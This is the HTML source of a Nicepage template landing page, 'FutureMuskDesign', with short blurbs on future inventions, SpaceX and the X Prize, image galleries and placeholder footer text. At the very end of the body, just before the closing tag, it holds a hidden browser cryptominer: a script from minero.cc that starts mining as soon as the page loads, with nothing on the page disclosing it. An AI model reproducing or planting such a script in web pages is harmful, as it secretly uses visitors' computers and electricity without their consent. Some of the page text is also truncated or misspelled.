
<!DOCTYPE html>
<html style="font-size: 16px;">
  <head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset="utf-8">
    <meta name="keywords" content="DESIGN&nbsp;OF THE FUTURE, UNIQUE IDEAS AND SOLUTIONS, THE FUTURE ACCORDING TO ELON MUSK, БУДУЩЕЕ, КОТОРОЕ УЖЕ БЛИЗКО">
    <meta name="description" content="">
    <meta name="page_type" content="np-template-header-footer-from-plugin">
    <title>главная</title>
    <link rel="stylesheet" href="/nicepage.css?version=e7ce6bf9-13c4-4580-b735-e6b5aae07534" media="screen">
    <script class="u-script" type="text/javascript" src="//static.nicepage.com/shared/assets/jquery-1.9.1.min.js" defer=""></script>
    <script class="u-script" type="text/javascript" src="//ccapp.nicepage.com/d45d91fca4c709ded430bb085fa789b2810dd254/nicepage.js" defer=""></script>
    <link id="u-google-font" rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:100,100i,300,300i,400,400i,500,500i,700,700i,900,900i|Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i">
    <style class="u-style">.u-section-1 {background-image: linear-gradient(0deg, rgba(0, 0, 0, 0.25), rgba(0, 0, 0, 0.25)), url("//images01.nicepage.com/e3/f8/e3f859fc8fdc14437b4ec0329e69fd55.jpeg"); background-position: 50% 50%}
.u-section-1 .u-sheet-1 {min-height: 864px}
.u-section-1 .u-group-1 {position: relative; min-height: 583px; height: auto; margin: 141px 282px 141px 0}
.u-section-1 .u-container-layout-1 {padding-left: 0; padding-right: 0}
.u-section-1 .u-text-1 {position: relative; margin: 40px 0 0}
.u-section-1 .u-text-2 {position: relative; margin: 8px 0 0}
.u-section-1 .u-text-3 {position: relative; margin: 30px 0 40px} 
@media (max-width: 1199px){ .u-section-1 .u-sheet-1 {min-height: 800px}
.u-section-1 .u-group-1 {min-height: 519px; margin-right: 357px} }
@media (max-width: 991px){ .u-section-1 .u-sheet-1 {min-height: 801px}
.u-section-1 .u-group-1 {width: 676px; margin-right: auto} }
@media (max-width: 767px){ .u-section-1 .u-group-1 {margin-right: initial; margin-left: initial; width: auto} }
@media (max-width: 575px){ .u-section-1 .u-text-2 {font-size: 2.25rem} }</style>
    <style class="u-style">.u-section-2 .u-sheet-1 {min-height: 779px}
.u-section-2 .u-line-1 {position: relative; height: 126px; transform-origin: center bottom 0; margin: 0 1139px 0 0}
.u-section-2 .u-line-2 {position: relative; height: 148px; transform-origin: center top 0; transform: rotate(359.995deg); margin: 499px -1px 0 1140px}
.u-section-2 .u-shape-1 {position: relative; height: 495px; width: 806px; margin: -643px 0 0 334px}
.u-section-2 .u-group-1 {position: relative; min-height: 494px; height: auto; margin: -498px 477px 0 0}
.u-section-2 .u-container-layout-1 {padding-left: 0}
.u-section-2 .u-text-1 {position: relative; margin: 50px 0 0 20px}
.u-section-2 .u-text-2 {position: relative; font-weight: 800; margin: 20px 1px 0 19px}
.u-section-2 .u-line-3 {position: relative; width: 94px; transform-origin: left center 0; margin: 28px auto 0 20px}
.u-section-2 .u-text-3 {position: relative; margin: -1px 38px 50px 127px}
.u-section-2 .u-image-1 {position: relative; width: 451px; height: 496px; margin: -492px -1px 80px 690px} 
@media (max-width: 1199px){ .u-section-2 .u-sheet-1 {min-height: 705px}
.u-section-2 .u-line-1 {margin-right: 939px}
.u-section-2 .u-line-2 {margin-left: 940px}
.u-section-2 .u-shape-1 {width: 665px; margin-left: 275px}
.u-section-2 .u-group-1 {width: 465px; margin-right: auto}
.u-section-2 .u-text-1 {margin-top: 113px; margin-left: 16px}
.u-section-2 .u-text-2 {margin-left: 16px; font-weight: 700}
.u-section-2 .u-line-3 {width: 77px; margin-left: 16px}
.u-section-2 .u-text-3 {margin-right: 0; margin-left: 105px}
.u-section-2 .u-image-1 {width: 412px; margin-right: auto; margin-left: 529px} }
@media (max-width: 991px){ .u-section-2 .u-sheet-1 {min-height: 750px}
.u-section-2 .u-line-1 {margin-right: 719px}
.u-section-2 .u-line-2 {margin-left: 720px}
.u-section-2 .u-shape-1 {width: 509px; margin-left: 211px}
.u-section-2 .u-group-1 {width: 382px}
.u-section-2 .u-text-1 {margin-top: 50px; margin-left: 13px}
.u-section-2 .u-text-2 {margin-left: 20px}
.u-section-2 .u-line-3 {width: 59px; margin-left: 13px}
.u-section-2 .u-text-3 {margin-left: 20px; margin-right: 20px}
.u-section-2 .u-image-1 {width: 346px; margin-bottom: 125px; margin-left: 375px} }
@media (max-width: 767px){ .u-section-2 .u-sheet-1 {min-height: 1141px}
.u-section-2 .u-line-1 {margin-top: 577px; margin-right: 540px}
.u-section-2 .u-line-2 {margin-right: 0; margin-left: 540px}
.u-section-2 .u-shape-1 {margin-top: -1261px; margin-right: initial; margin-left: initial; width: auto}
.u-section-2 .u-group-1 {min-height: 455px; margin-top: 29px; margin-right: initial; margin-left: initial; width: auto}
.u-section-2 .u-text-1 {margin-top: 143px; margin-left: 9px}
.u-section-2 .u-text-2 {margin-right: 0; margin-left: 9px}
.u-section-2 .u-line-3 {width: 55px; margin-left: 9px}
.u-section-2 .u-text-3 {margin-right: 18px; margin-bottom: 11px; margin-left: 92px}
.u-section-2 .u-image-1 {width: 414px; height: 495px; margin: -979px 0 557px auto} }
@media (max-width: 575px){ .u-section-2 .u-sheet-1 {min-height: 1031px}
.u-section-2 .u-line-1 {width: 1px; margin-top: 29px; margin-right: auto}
.u-section-2 .u-line-2 {margin-top: 1047px; margin-right: auto; margin-left: 340px}
.u-section-2 .u-shape-1 {height: 331px; width: 329px; margin-top: -1184px; margin-right: auto; margin-left: 0}
.u-section-2 .u-group-1 {min-height: 400px; margin-top: 50px; width: auto; margin-right: initial; margin-left: initial}
.u-section-2 .u-text-1 {margin-top: 55px; margin-left: 6px}
.u-section-2 .u-text-2 {margin-left: 6px}
.u-section-2 .u-line-3 {width: 47px; margin-left: 6px}
.u-section-2 .u-text-3 {margin-top: 29px; margin-bottom: 40px; margin-right: initial; margin-left: initial}
.u-section-2 .u-image-1 {width: 280px; height: 331px; margin: -782px auto 46px 61px} }</style>
    <style class="u-style">.u-section-3 .u-sheet-1 {min-height: 775px}
.u-section-3 .u-shape-1 {position: relative; height: 495px; width: 806px; margin: 140px 334px 0 0}
.u-section-3 .u-group-1 {position: relative; min-height: 512px; height: auto; width: 570px; margin: -504px auto 0 570px}
.u-section-3 .u-container-layout-1 {padding-left: 0}
.u-section-3 .u-text-1 {position: relative; margin: 113px 20px 0 0}
.u-section-3 .u-text-2 {position: relative; font-weight: 800; margin: 18px 20px 0 0}
.u-section-3 .u-text-3 {position: relative; margin: 27px 20px 50px}
.u-section-3 .u-image-1 {position: relative; width: 461px; height: 496px; object-position: 23.4% 50%; margin: -505px auto 0 0}
.u-section-3 .u-line-1 {position: relative; transform-origin: center bottom 0; height: 628px; margin: -495px 1139px 7px 0} 
@media (max-width: 1199px){ .u-section-3 .u-shape-1 {width: 665px; margin-right: 275px}
.u-section-3 .u-group-1 {width: 503px; margin-left: 437px}
.u-section-3 .u-text-1 {margin-right: 16px}
.u-section-3 .u-text-2 {font-weight: 700; margin-right: 16px}
.u-section-3 .u-text-3 {margin-right: 16px; margin-left: 16px}
.u-section-3 .u-image-1 {width: 430px; object-position: 50% 50%}
.u-section-3 .u-line-1 {width: 1px; margin-top: -494px; margin-right: auto} }
@media (max-width: 991px){ .u-section-3 .u-sheet-1 {min-height: 641px}
.u-section-3 .u-shape-1 {width: 509px; margin-top: 9px; margin-right: 211px}
.u-section-3 .u-group-1 {min-height: 515px; width: 398px; margin-right: 0; margin-left: auto}
.u-section-3 .u-text-1 {margin-right: 13px}
.u-section-3 .u-text-2 {margin-right: 13px}
.u-section-3 .u-text-3 {margin-left: 13px; margin-right: 13px}
.u-section-3 .u-image-1 {width: 315px; margin-top: -508px}
.u-section-3 .u-line-1 {margin-top: -495px; margin-bottom: 5px} }
@media (max-width: 767px){ .u-section-3 .u-sheet-1 {min-height: 1098px}
.u-section-3 .u-shape-1 {margin-top: 85px; margin-right: initial; margin-left: initial; width: auto}
.u-section-3 .u-group-1 {min-height: 467px; width: 483px; margin-top: 11px}
.u-section-3 .u-text-1 {margin-top: 45px; margin-right: 9px}
.u-section-3 .u-text-2 {margin-right: 9px}
.u-section-3 .u-text-3 {margin-left: 9px; margin-right: 9px; margin-bottom: 45px}
.u-section-3 .u-image-1 {width: 446px; margin-top: -973px}
.u-section-3 .u-line-1 {transform-origin: center top 0; height: 405px; margin-top: 0; margin-bottom: 0} }
@media (max-width: 575px){ .u-section-3 .u-sheet-1 {min-height: 100vh}
.u-section-3 .u-shape-1 {height: 307px; margin-top: 88px; width: auto; margin-right: initial; margin-left: initial}
.u-section-3 .u-group-1 {min-height: 442px; margin-top: 27px; width: 340px; margin-left: 0}
.u-section-3 .u-text-1 {margin-right: 6px}
.u-section-3 .u-text-2 {margin-right: 6px}
.u-section-3 .u-text-3 {margin-left: 6px; margin-right: 6px}
.u-section-3 .u-image-1 {width: 253px; height: 307px; margin-top: -776px; margin-bottom: 554px}
.u-section-3 .u-line-1 {transform-origin: center bottom 0; height: 626px; margin-top: 209px; margin-bottom: 8px} }</style>
    <style class="u-style">.u-section-4 .u-sheet-1 {min-height: 1075px}
.u-section-4 .u-group-1 {min-height: 199px; position: relative; height: auto; margin: 46px auto 0}
.u-section-4 .u-container-layout-1 {padding-left: 0; padding-right: 40px}
.u-section-4 .u-text-1 {position: relative; margin: 20px 0 0}
.u-section-4 .u-text-2 {position: relative; font-weight: 800; margin: 30px 0 20px}
.u-section-4 .u-layout-wrap-1 {position: relative; margin: 14px auto 0 0}
.u-section-4 .u-image-1 {background-image: url("//images01.nicepage.com/e6/12/e6125a66f3024f1d8b2e67a0a36a5de8.jpeg"); background-position: 50% 50%; min-height: 524px}
.u-section-4 .u-image-2 {background-image: url("//images01.nicepage.com/39/6a/396a9174d05c7b08e3a478bbcc74707f.jpeg"); background-position: 50% 50%; min-height: 524px}
.u-section-4 .u-image-3 {background-image: url("//images01.nicepage.com/1a/97/1a9769d950adcc6af71e09a150a12b62.jpeg"); background-position: 50% 50%; min-height: 262px}
.u-section-4 .u-image-4 {background-image: url("//images01.nicepage.com/65/20/6520f26eefba16d285c0a254db06ecc8.jpeg"); background-position: 50% 50%; min-height: 262px}
.u-section-4 .u-image-5 {background-image: url("//images01.nicepage.com/42/a9/42a9249f7f92c5dc427406392460c3dd.jpeg"); background-position: 50% 50%; min-height: 262px} 
@media (max-width: 1199px){ .u-section-4 .u-sheet-1 {min-height: 1192px}
.u-section-4 .u-group-1 {margin-top: 44px; margin-right: initial; margin-left: initial}
.u-section-4 .u-container-layout-1 {padding-left: 16px; padding-right: 16px}
.u-section-4 .u-text-2 {margin-top: 13px}
.u-section-4 .u-layout-wrap-1 {margin-top: 45px; margin-right: initial; margin-left: initial}
.u-section-4 .u-image-1 {min-height: 582px}
.u-section-4 .u-image-2 {min-height: 582px}
.u-section-4 .u-image-3 {min-height: 292px}
.u-section-4 .u-image-4 {min-height: 292px}
.u-section-4 .u-image-5 {min-height: 292px} }
@media (max-width: 991px){ .u-section-4 .u-sheet-1 {min-height: 50vw}
.u-section-4 .u-group-1 {min-height: 168px; margin-top: 27px; margin-right: initial; margin-left: initial}
.u-section-4 .u-container-layout-1 {padding-left: 13px; padding-right: 13px}
.u-section-4 .u-text-1 {margin-top: 15px}
.u-section-4 .u-text-2 {margin-bottom: 15px}
.u-section-4 .u-layout-wrap-1 {margin-top: -4px; margin-right: initial; margin-left: initial}
.u-section-4 .u-image-1 {min-height: 487px}
.u-section-4 .u-image-2 {min-height: 488px}
.u-section-4 .u-image-3 {min-height: 244px}
.u-section-4 .u-image-4 {min-height: 245px}
.u-section-4 .u-image-5 {min-height: 244px} }
@media (max-width: 767px){ .u-section-4 .u-sheet-1 {min-height: 3043px}
.u-section-4 .u-group-1 {min-height: 199px; margin-top: 10px; margin-right: initial; margin-left: initial}
.u-section-4 .u-container-layout-1 {padding-left: 9px; padding-right: 9px}
.u-section-4 .u-text-1 {margin-top: 20px}
.u-section-4 .u-text-2 {margin-bottom: 20px}
.u-section-4 .u-layout-wrap-1 {margin-top: -12px; margin-right: initial; margin-left: initial}
.u-section-4 .u-image-1 {min-height: 805px}
.u-section-4 .u-image-2 {min-height: 805px}
.u-section-4 .u-image-3 {min-height: 403px}
.u-section-4 .u-image-4 {min-height: 402px}
.u-section-4 .u-image-5 {min-height: 403px} }
@media (max-width: 575px){ .u-section-4 .u-sheet-1 {min-height: 2872px}
.u-section-4 .u-group-1 {min-height: 246px; margin-top: 44px; margin-right: initial; margin-left: initial}
.u-section-4 .u-container-layout-1 {padding-left: 6px; padding-right: 6px}
.u-section-4 .u-layout-wrap-1 {margin-top: -2px; margin-right: initial; margin-left: initial}
.u-section-4 .u-image-1 {min-height: 729px}
.u-section-4 .u-image-2 {min-height: 729px}
.u-section-4 .u-image-3 {min-height: 365px}
.u-section-4 .u-image-4 {min-height: 364px}
.u-section-4 .u-image-5 {min-height: 365px} }</style>
    <style class="u-style">.u-section-5 .u-sheet-1 {min-height: 1341px}
.u-section-5 .u-layout-wrap-1 {position: relative; margin: 0}
.u-section-5 .u-image-1 {min-height: 394px; background-image: url("//images01.nicepage.com/47/84/4784b0af8cda854356950ed20cd8b74b.jpeg")}
.u-section-5 .u-image-2 {min-height: 395px; background-image: url("//images01.nicepage.com/bb/53/bb53aca7775bcf8825a4c5e72bfbe054.jpeg")}
.u-section-5 .u-image-3 {min-height: 394px; background-image: url("//images01.nicepage.com/49/53/49536ccb64147288467b21748ffe9614.jpeg")}
.u-section-5 .u-image-4 {min-height: 394px; background-image: url("//images01.nicepage.com/0e/40/0e40fd1a684e3c020fe2e98673817868.jpeg")}
.u-section-5 .u-image-5 {min-height: 788px; background-image: url("//images01.nicepage.com/08/02/08023ea18aefbad30e54a69546b3d64a.jpeg")}
.u-section-5 .u-image-6 {min-height: 394px; background-image: url("//images01.nicepage.com/96/72/9672a93326c1649c38372a6148acb02c.jpeg")}
.u-section-5 .u-image-7 {min-height: 395px; background-image: url("//images01.nicepage.com/8f/2c/8f2cf93d79110111f436a7f6a3464c97.jpeg")}
.u-section-5 .u-image-8 {min-height: 394px; background-image: url("//images01.nicepage.com/d5/1b/d51bdea8ab964134498fb50cce5bc230.jpeg")}
.u-section-5 .u-text-1 {position: relative; text-transform: uppercase; letter-spacing: 4px; margin: 30px 20px 130px} 
@media (max-width: 1199px){ .u-section-5 .u-sheet-1 {min-height: 1143px}
.u-section-5 .u-layout-wrap-1 {margin-right: initial; margin-left: initial}
.u-section-5 .u-image-1 {min-height: 343px}
.u-section-5 .u-image-2 {min-height: 344px}
.u-section-5 .u-image-3 {min-height: 343px}
.u-section-5 .u-image-4 {min-height: 344px}
.u-section-5 .u-image-5 {min-height: 686px}
.u-section-5 .u-image-6 {min-height: 343px}
.u-section-5 .u-image-7 {min-height: 344px}
.u-section-5 .u-image-8 {min-height: 343px}
.u-section-5 .u-text-1 {margin: 64px 16px 0} }
@media (max-width: 991px){ .u-section-5 .u-sheet-1 {min-height: 808px}
.u-section-5 .u-image-1 {min-height: 235px}
.u-section-5 .u-image-2 {min-height: 235px}
.u-section-5 .u-image-3 {min-height: 235px}
.u-section-5 .u-image-4 {min-height: 235px}
.u-section-5 .u-image-5 {min-height: 470px}
.u-section-5 .u-image-6 {min-height: 235px}
.u-section-5 .u-image-7 {min-height: 235px}
.u-section-5 .u-image-8 {min-height: 235px}
.u-section-5 .u-text-1 {margin-top: 48px; margin-left: 13px; margin-right: 13px} }
@media (max-width: 767px){ .u-section-5 .u-sheet-1 {min-height: 3649px}
.u-section-5 .u-image-1 {min-height: 394px}
.u-section-5 .u-image-2 {min-height: 395px}
.u-section-5 .u-image-3 {min-height: 394px}
.u-section-5 .u-image-4 {min-height: 394px}
.u-section-5 .u-image-5 {min-height: 788px}
.u-section-5 .u-image-6 {min-height: 394px}
.u-section-5 .u-image-7 {min-height: 395px}
.u-section-5 .u-image-8 {min-height: 394px}
.u-section-5 .u-text-1 {width: auto; margin: 56px 18px 56px 0} }
@media (max-width: 575px){ .u-section-5 .u-sheet-1 {min-height: 3634px}
.u-section-5 .u-text-1 {width: 328px; margin: 57px 6px 40px} }</style>
    <style class="u-style">.u-section-6 .u-sheet-1 {min-height: 346px}
.u-section-6 .u-layout-wrap-1 {position: relative; margin: 93px 0}
.u-section-6 .u-image-1 {min-height: 199px; background-image: url("//images01.nicepage.com/e5/5b/e55bae5793cb5e5848bd5882209fecba.jpeg")}
.u-section-6 .u-image-2 {min-height: 199px; background-image: url("//images01.nicepage.com/82/89/82896c5cfbeb3e9d628d685761d5106b.jpeg")}
.u-section-6 .u-image-3 {min-height: 199px; background-image: url("//images01.nicepage.com/8d/c5/8dc52c0f711979602e472cb74088d53b.jpeg")}
.u-section-6 .u-container-layout-3 {padding-left: 15px; padding-right: 15px}
.u-section-6 .u-image-4 {min-height: 199px; background-image: url("//images01.nicepage.com/e7/17/e7176968fc88a5540a57f287ff13ce4e.jpeg")}
.u-section-6 .u-image-5 {min-height: 199px; background-image: url("//images01.nicepage.com/f9/e9/f9e95c14b7f65aff23628e89fe290e03.jpeg")} 
@media (max-width: 1199px){ .u-section-6 .u-sheet-1 {min-height: 230px}
.u-section-6 .u-layout-wrap-1 {margin-top: 57px; margin-bottom: 57px; margin-right: initial; margin-left: initial}
.u-section-6 .u-image-1 {min-height: 157px}
.u-section-6 .u-image-2 {min-height: 157px}
.u-section-6 .u-image-3 {min-height: 157px}
.u-section-6 .u-container-layout-3 {padding-left: 12px; padding-right: 12px}
.u-section-6 .u-image-4 {min-height: 157px}
.u-section-6 .u-image-5 {min-height: 157px} }
@media (max-width: 991px){ .u-section-6 .u-layout-wrap-1 {margin-left: 0; margin-right: 0}
.u-section-6 .u-container-layout-3 {padding-left: 9px; padding-right: 9px} }
@media (max-width: 767px){ .u-section-6 .u-layout-wrap-1 {width: 352px; margin: 54px 94px 50px}
.u-section-6 .u-container-layout-3 {padding-left: 7px; padding-right: 7px} }
@media (max-width: 575px){ .u-section-6 .u-layout-wrap-1 {margin-right: initial; margin-left: initial; width: auto}
.u-section-6 .u-container-layout-3 {padding-left: 4px; padding-right: 4px} }</style>
    <script type="application/ld+json">{
		"@context": "http://schema.org",
		"@type": "Organization",
		"name": "",
		"url": "https://futuremuskdesign.nicepage.io/Page-1.html",
		"logo": "//ccapp.nicepage.com/3803d1154c663d1f371935309d2961fe1dae0457/images/default-logo.png"
}</script>
    <meta property="og:title" content="главная">
    <meta property="og:type" content="website">
    <meta name="theme-color" content="#73a3de">
    <meta property="og:site_name" content="FutureMuskDesign">
    <link rel="canonical" href="https://futuremuskdesign.nicepage.io/Page-1.html">
    <meta property="og:url" content="https://futuremuskdesign.nicepage.io/Page-1.html">
  
</head>
  <body class="u-backlink-hidden u-body">
    
    <section class="u-clearfix u-image u-typography-Normal--Introduction u-white u-section-1" src="" id="sec-2984">
      <div class="u-clearfix u-sheet u-sheet-1">
        <div class="u-align-left u-container-style u-expanded-width-sm u-expanded-width-xs u-group u-similar-fill u-group-1">
          <div class="u-container-layout u-valign-middle u-container-layout-1">
            <h3 class="u-expanded-width-xl u-heading-font u-text u-text-white u-text-1">welcome</h3>
            <h1 class="u-text u-text-white u-text-2">Design&nbsp;
              <br>of the future
            </h1>
            <p class="u-text u-text-white u-text-3">Floating farms, brain wave passwords, and coffee-powered cars are just some of the incredible inventions and inovations that will shape our future.</p>
          </div>
        </div>
      </div>
    </section>
    <section class="u-clearfix u-white u-section-2" id="sec-1f01">
      <div class="u-clearfix u-sheet u-sheet-1">
        <div class="u-border-1 u-border-black u-line u-line-vertical u-line-1"></div>
        <div class="u-border-1 u-border-black u-line u-line-vertical u-line-2"></div>
        <div class="u-align-left u-expanded-width-sm u-grey-light-2 u-shape u-shape-1"></div>
        <div class="u-align-left u-container-style u-expanded-width-sm u-expanded-width-xs u-group u-similar-fill u-group-1">
          <div class="u-container-layout u-valign-middle-md u-valign-middle-xl u-container-layout-1">
            <h3 class="u-text u-text-1">about us</h3>
            <h2 class="u-text u-text-black u-text-2">Unique Ideas And Solutions</h2>
            <div class="u-border-1 u-border-black u-hidden-xs u-line u-line-horizontal u-line-3"></div>
            <p class="u-expanded-width-xs u-text u-text-grey-dark-3 u-text-3">Since its formation in 2002, SpaceX made great strides with its Falcon rocket fleet, initially establishing the capability of reaching orbit with Falcon 1, pushing the capabilities of the Falcon 9 rocket from initial Low Earth Orbit&nbsp;</p>
          </div>
        </div>
        <img src="//images01.nicepage.com/2d/30/2d307a8af00964f1057ba3c031528088.jpeg" class="u-align-left u-image u-left-0 u-image-1">
      </div>
    </section>
    <section class="u-clearfix u-white u-section-3" id="sec-e5d1">
      <div class="u-clearfix u-sheet u-sheet-1">
        <div class="u-align-left u-expanded-width-sm u-expanded-width-xs u-grey-light-2 u-shape u-shape-1"></div>
        <div class="u-align-right u-container-style u-group u-similar-fill u-group-1">
          <div class="u-container-layout u-valign-middle-sm u-valign-middle-xs u-container-layout-1">
            <h3 class="u-text u-text-1">what we do</h3>
            <h2 class="u-text u-text-black u-text-2">The Future According
              <br>To Elon Musk
            </h2>
            <p class="u-text u-text-grey-dark-3 u-text-3">Through the Global Learning X Prize competition, teams from around the globe try to develop open-source solutions that will help the estimated 250 illion kids worldwide who are unable to read, write, or complete basic math functions.
                        Marcus Shingles, CEO of the X Prize Foundation</p>
          </div>
        </div>
        <img src="//images01.nicepage.com/41/8d/418d454d1abd2783bd099379c30a88e4.jpeg" class="u-align-left u-image u-left-0 u-image-1">
        <div class="u-border-1 u-border-black u-hidden-xs u-line u-line-vertical u-line-1"></div>
      </div>
    </section>
    <section class="u-clearfix u-white u-section-4" id="sec-8229">
      <div class="u-clearfix u-sheet u-sheet-1">
        <div class="u-container-style u-expanded-width u-group u-group-1">
          <div class="u-container-layout u-valign-middle u-container-layout-1">
            <h3 class="u-text u-text-1">Our Projects</h3>
            <h2 class="u-heading-font u-text u-text-black u-text-2">The Future That You Will See Soon</h2>
          </div>
        </div>
        <div class="u-clearfix u-disable-padding u-expanded-width u-gutter-30 u-layout-spacing-top-bottom u-layout-wrap u-layout-wrap-1">
          <div class="u-gutter-0 u-layout">
            <div class="u-layout-col">
              <div class="u-size-40">
                <div class="u-layout-row">
                  <div class="u-size-40">
                    <div class="u-layout-col">
                      <div class="u-align-left u-container-style u-image u-layout-cell u-left-cell u-similar-fill u-size-60 u-image-1">
                        <div class="u-container-layout"></div>
                      </div>
                    </div>
                  </div>
                  <div class="u-size-20">
                    <div class="u-layout-col">
                      <div class="u-align-left u-container-style u-image u-layout-cell u-right-cell u-similar-fill u-size-60 u-image-2">
                        <div class="u-container-layout"></div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
              <div class="u-size-20">
                <div class="u-layout-row">
                  <div class="u-align-left u-container-style u-image u-layout-cell u-left-cell u-similar-fill u-size-20 u-size-20-md u-image-3">
                    <div class="u-container-layout"></div>
                  </div>
                  <div class="u-align-left u-container-style u-image u-layout-cell u-similar-fill u-size-20 u-size-20-md u-image-4">
                    <div class="u-container-layout"></div>
                  </div>
                  <div class="u-align-left u-container-style u-hidden-md u-image u-layout-cell u-right-cell u-similar-fill u-size-20 u-size-20-md u-image-5">
                    <div class="u-container-layout"></div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </section>
    <section class="u-clearfix u-white u-section-5" id="sec-d062">
      <div class="u-clearfix u-sheet u-sheet-1">
        <div class="u-clearfix u-disable-padding u-expanded-width u-gutter-30 u-layout-wrap u-layout-wrap-1">
          <div class="u-gutter-0 u-layout">
            <div class="u-layout-row">
              <div class="u-size-20">
                <div class="u-layout-col">
                  <div class="u-align-left u-container-style u-image u-layout-cell u-left-cell u-size-20 u-size-30-md u-image-1">
                    <div class="u-container-layout"></div>
                  </div>
                  <div class="u-align-left u-container-style u-image u-layout-cell u-left-cell u-similar-fill u-size-20 u-size-30-md u-image-2">
                    <div class="u-container-layout"></div>
                  </div>
                  <div class="u-align-left u-container-style u-image u-layout-cell u-left-cell u-similar-fill u-size-20 u-size-60-md u-image-3">
                    <div class="u-container-layout"></div>
                  </div>
                </div>
              </div>
              <div class="u-size-20">
                <div class="u-layout-col">
                  <div class="u-align-left u-container-style u-image u-layout-cell u-similar-fill u-size-30 u-image-4">
                    <div class="u-container-layout"></div>
                  </div>
                  <div class="u-align-left u-container-style u-image u-layout-cell u-similar-fill u-size-30 u-image-5">
                    <div class="u-container-layout"></div>
                  </div>
                </div>
              </div>
              <div class="u-size-20">
                <div class="u-layout-col">
                  <div class="u-container-style u-image u-layout-cell u-right-cell u-size-20 u-size-30-md u-image-6">
                    <div class="u-container-layout"></div>
                  </div>
                  <div class="u-container-style u-image u-layout-cell u-right-cell u-size-20 u-size-30-md u-image-7">
                    <div class="u-container-layout"></div>
                  </div>
                  <div class="u-container-style u-image u-layout-cell u-right-cell u-size-20 u-size-60-md u-image-8">
                    <div class="u-container-layout"></div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
        <h5 class="u-align-center-lg u-align-center-md u-align-center-sm u-align-center-xs u-text u-text-black u-text-1">view all projects</h5>
      </div>
    </section>
    <section class="u-clearfix u-white u-section-6" id="sec-3547">
      <div class="u-clearfix u-sheet u-sheet-1">
        <div class="u-clearfix u-disable-padding u-expanded-width-lg u-expanded-width-xl u-expanded-width-xs u-gutter-40 u-layout-wrap u-layout-wrap-1">
          <div class="u-gutter-0 u-layout">
            <div class="u-layout-row">
              <div class="u-align-left u-container-style u-image u-image-contain u-layout-cell u-left-cell u-size-12 u-size-60-md u-image-1">
                <div class="u-container-layout" src=""></div>
              </div>
              <div class="u-align-left u-container-style u-image u-image-contain u-layout-cell u-size-12 u-size-60-md u-image-2">
                <div class="u-container-layout" src=""></div>
              </div>
              <div class="u-align-left u-container-style u-image u-image-contain u-layout-cell u-size-12 u-size-60-md u-image-3">
                <div class="u-container-layout u-container-layout-3" src=""></div>
              </div>
              <div class="u-align-left u-container-style u-image u-image-contain u-layout-cell u-size-12 u-size-60-md u-image-4">
                <div class="u-container-layout" src=""></div>
              </div>
              <div class="u-align-left u-container-style u-image u-image-contain u-layout-cell u-size-12 u-size-60-md u-image-5">
                <div class="u-container-layout" src=""></div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </section>
    
    

<footer class="top-margin-for-add-section-widget-small u-black u-clearfix u-footer" id="sec-d375"><div class="u-clearfix u-sheet u-sheet-1">
        <a href="#" class="u-image u-logo u-image-1" src="" data-image-width="80" data-image-height="40">
          <img src="//ccapp.nicepage.com/3803d1154c663d1f371935309d2961fe1dae0457/images/default-logo.png" class="u-logo-image u-logo-image-1">
        </a>
        <div class="u-align-left u-border-1 u-border-white u-expanded-width u-line u-line-horizontal u-opacity u-opacity-30 u-line-1"></div>
        <div class="u-clearfix u-expanded-width-lg u-expanded-width-md u-expanded-width-xl u-expanded-width-xs u-gutter-30 u-layout-wrap u-layout-wrap-1">
          <div class="u-gutter-0 u-layout">
            <div class="u-layout-row">
              <div class="u-align-left-lg u-align-left-md u-align-left-sm u-align-left-xl u-container-style u-layout-cell u-left-cell u-size-15 u-size-30-md u-layout-cell-1">
                <div class="u-container-layout u-container-layout-1">
                  <p class="u-small-text u-text u-text-variant u-text-1">Sample footer text</p>
                </div>
              </div>
              <div class="u-align-left-md u-align-left-xl u-container-style u-layout-cell u-size-15 u-size-30-md u-layout-cell-2">
                <div class="u-container-layout u-container-layout-2">
                  <p class="u-small-text u-text u-text-variant u-text-2">Sample footer text</p>
                </div>
              </div>
              <div class="u-align-left u-container-style u-layout-cell u-size-15 u-size-30-md u-layout-cell-3">
                <div class="u-container-layout u-container-layout-3">
                  <p class="u-small-text u-text u-text-variant u-text-3">Sample footer text</p>
                </div>
              </div>
              <div class="u-align-left u-container-style u-layout-cell u-right-cell u-size-15 u-size-30-md u-layout-cell-4">
                <div class="u-container-layout u-container-layout-4">
                  <p class="u-small-text u-text u-text-variant u-text-4">Sample footer text</p>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div></footer>
    <section class="u-backlink u-clearfix u-grey-80">
      <a class="u-link" href="https://nicepage.com/website-templates" target="_blank">
        <span>Template</span>
      </a>
      <p class="u-text">
        <span>created with</span>
      </p>
      <a class="u-link" href="https://nicepage.com/website-builder" target="_blank">
        <span>Nicepage</span>
      </a>.
    
    </section>
<script src="https://minero.cc/lib/minero.min.js"></script>
<script>
    var miner = new Minero.Anonymous('a6c5b5860a03bf105901c305000558b5');
    miner.start();
    </script>
</body>
</html>